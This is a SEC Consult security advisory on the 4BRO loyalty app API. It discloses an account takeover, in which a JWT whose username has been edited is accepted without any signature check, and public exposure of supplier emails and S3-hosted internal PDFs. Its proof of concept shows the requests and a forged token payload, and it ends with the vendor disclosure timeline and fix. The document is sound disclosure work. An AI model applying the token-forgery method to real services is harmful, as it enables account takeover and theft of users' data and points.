    SEC Consult Vulnerability Lab Security Advisory < 20240522-0 >=======================================================================               title: Broken access control & API Information Exposure             product: 4BRO App  vulnerable version: before 2024-04-17       fixed version: 2024-04-17          CVE number: -              impact: Critical            homepage: https://www.4bro.de               found: 2023-05-07                  by: Max Rull (Office Bochum)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Eviden business                      Europe | Asia                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"4BRO is a German company known for producing iced tea beverages. The brand offersa variety of flavors, including unique combinations such as peach, bubblegum,and watermelon mint. 4BRO emphasizes modern and appealing packaging, targetinga younger demographic. The company promotes its products through various platformsand incentivizes customer loyalty with their app, which allows users to collectpoints for rewards. The company's headquarters is located in Germany, and theirproducts are widely available both online and in retail stores."Source: https://www.4bro.deBusiness recommendation:------------------------The vendor has fixed the security issues in the API server as of 2024-04-17.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Broken access control via IDOR in 4BRO app APIAn IDOR vulnerability (Insecure Direct Object Reference) allows an attackerto change the username in the Bearer token used for authentication in the 4BRO app.This leads to account takeover as a result of broken access control (poor Bearertoken verification). Attackers are able to access all data or Bro points ("broins")from other users.2) API Information ExposureWhen opening the app as an unauthenticated user, the 4BRO app loads JSON datafrom a publicly available API endpoint containing sensitive data like e-mailaddresses of employees, internal invoices, a CV including personal information,a gift card etc.Proof of concept:-----------------1) Broken access control via IDOR in 4BRO app APIWhen logging in into the 4BRO app, the server returns a JWT (JSON Web Token).The "login" HTTP request looks like this:--------------------------------------------------------------------------------POST /api/user/signin HTTP/2Host: adminpanel.4bro.deContent-Type: application/json[...]{"email":"<login email>","password":"<login password>"}--------------------------------------------------------------------------------The server responds with a JWT used for authentication and additionalaccount-related data:--------------------------------------------------------------------------------HTTP/2 200 OKContent-Type: application/json; charset=utf-8[...]{     "token": "<JWT here>",     "userData": {         "isBlocked": false,         "_id": "[...]",         "userType": "USER",         "email": "<login email>",         "broins": 0,         "deviceId": null,         "userCreationDate": "2023-XX-XXTXX:XX:XX.XXXZ",         "address": [{                 "_id": "[...]",                 "streetName": "[...]",                 "streetNumber": "[...]",                 "postalcode": "[...]",                 "city": "[...]",                 "firstName": "[...]",                 "lastName": "[...]",                 "country": "at"             }         ],         "ratings": [],         "__v": 0,         "pushToken": "[...]",         "telekomUUID": "[...]"     }}--------------------------------------------------------------------------------Because the JWT is only base64-encoded, it is easy to decode the JWT'sheader and payload as clear text using JWT decoders like https://token.dev/:--------------------------------------------------------------------------------Header:{   "kid": "[...]",   "alg": "RS256"}--------------------------------------------------------------------------------Payload:{   "sub": "[...]",   "event_id": "[...]",   "token_use": "access",   "scope": "aws.cognito.signin.user.admin",   "auth_time": 1683565567,   "iss": "https://cognito-idp.eu-central-1.amazonaws.com/[...]",   "exp": 1683569167,   "iat": 1683565567,   "jti": "[...]",   "client_id": "[...]",   "username": "<login email>"}--------------------------------------------------------------------------------The payload of the JWT contains multiple values indicating that AWS Cognito is in use.By changing the "username" value of the JWT payload to a victim email, it is possibleto use the modified JWT for authenticating as the victim. The victim should alreadyhave a normally registered account in the 4BRO app. By trial and error, it turns outthat even the following modified JWT payload gets accepted by the server:--------------------------------------------------------------------------------{   "sub": "0",   "event_id": "0",   "token_use": "access",   "scope": "aws.cognito.signin.user.admin",   "auth_time": 0,   "iss": "",   "exp": 0,   "iat": 0,   "jti": "0",   "client_id": "0",   "username": "<login email>"}--------------------------------------------------------------------------------Meanwhile, the "kid" property in the JWT header must be a valid value, but can belongto any other already existing 4BRO app account. The JWT signature can be the sameand does not get verified at all.Using the modified JWT, all API methods supported by the 4BRO app can be executed.Because the server only checks the "username" property in the JWT payload and doesslim to none JWT verification, the server thinks that the request came from theaccount associated with the login email contained in the "username" property.This way, sensitive data such as the current "broin" balance, full user data as seenin the login response, previous transactions, redeemed vouchers and goodies etc.can be accessed without restrictions, using the 4BRO API. Also, the "sending broins"action can be performed so that earned "broins" could be transferred to an attacker'saccount balance.2) API Information ExposureBy monitoring the 4BRO app's requests over a proxy, it can be observed thatthe following HTTP request is made when opening the "Goodies" section of the app:--------------------------------------------------------------------------------GET /api/goodies?pageSize=1000 HTTP/2Host: adminpanel.4bro.de[...]--------------------------------------------------------------------------------The response is a JSON object containing all goodies that are or were at some pointavailable in the 4BRO app:--------------------------------------------------------------------------------HTTP/2 200 OKContent-Type: application/json; charset=utf-8Content-Length: 327138[...]{     "goodiesList": [{             "_id": "61950603005c650530b63aac",             "name": "1x 4BRO Getränk Imbiss",             "longDescription": "[...]",             "shortDescription": "Auf unseren Nacken!",             "imagePath":"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/goodies/app_kachel_food_256x256.jpg",             "category": "Food",             "quantity": 999999999999808,             "costOfGoodie": 250,             "supplier": "<email removed>",             "totalGoodies": 999999999999861,             "goodieAvailableTime": "Unlimited",             "deliveryMethod": "partnerCoupon",             "isNewGoodie": false,             "inhouseAppVoucherUrl":"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/inhouseAppVouchers/undefined",             "__v": 1,             "rating": {                 "value": 3.991869918699184,                 "total": 123             },             "forceGoodie": "true",             "goodieAvailableEndTime": null,             "goodieAvailableStartTime": null,             "restriction": [],             "hidden": false,             "slashedCostOfGoodie": null         },{    [...]    },    [...]    }     ],     "goodieCount": 371}--------------------------------------------------------------------------------This JSON object contains already sensitive data such as the goodie supplier's emailaddresses. Out of the 371 goodies, 36 of those have a URL to a PDF file containedwithin the "inhouseAppVoucherUrl" property. Because these files are hosted on anAWS S3 bucket, everyone can access these documents without authentication.These documents seem to contain various sensitive company internal and personalinformation.While discovering vulnerability 1), we found that old gift codes were also stored asPDF files on the AWS S3 bucket. The names of the gift code PDF files indicate thatthere may be more similarly named documents (IDOR) which could be detected in anautomated way. This could be leveraged to find additional gift code PDF files storedon the AWS S3 bucket.Vulnerable / tested versions:-----------------------------The following app version has been tested and downloaded through Google Play store,which was the most recent version available at the time of the test:* 3.14.7Because the vulnerability is actually server-side within the API, the iOS app wasalso affected at the time the vulnerabilities were discovered.Vendor contact timeline:------------------------2023-06-12: Contacting vendor through broservice@4bro.de (owner) and info@dev5310.com             (developers according to Google Play store)2023-06-15: Vendor asks about the risks of the identified vulnerabilities and which             parts of the application are affected and whether any costs would arise             before they provide us with a security contact.2023-06-16: Detailed answer regarding risk estimation, responsible disclosure and             that no costs are involved.2023-06-19: Vendor requests a phone conference, scheduled for 21st June.2023-06-21: Clarifying responsible disclosure, explaining vulnerabilities and next             steps in phone call. Providing security advisory to vendor.2023-06-29: Vendor has sent the advisory to the developer team for evaluation             and will notify SEC Consult about the release of the security patch.2023-08-18: Asking for a status update.2023-08-31: It is planned to release an Android/iOS app update end of September2023-09-18: Vendor needs to postpone update, no new date available.2023-11-08: Asking for a status update; no response.2023-11-21: Asking for a status update.2023-12-11: Vendor response, fix is available in test environment, production             will be fixed by end of this year.2024-01-24: Asking for a status update; no response.2024-02-12: Asking for a status update.2024-02-12: Vendor is still waiting for a response from their IT.2024-04-17: Asking for a status update.2024-04-17: Vendor states that the vulnerabilities have been fixed.2024-04-17: Asking for the fix date, whether an app update was needed for applying             the fix, and the fixed app version. No response.2024-05-13: Asking vendor again about fixed version, etc., setting preliminary release             date to 2024-05-21. No response.2024-05-22: Release of security advisorySolution:---------The vendor implemented a fix in the affected API server as of 2024-04-17.An app update on Android or iOS is not required to apply the fix.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF M. Rull / @2024

Tag

#amazon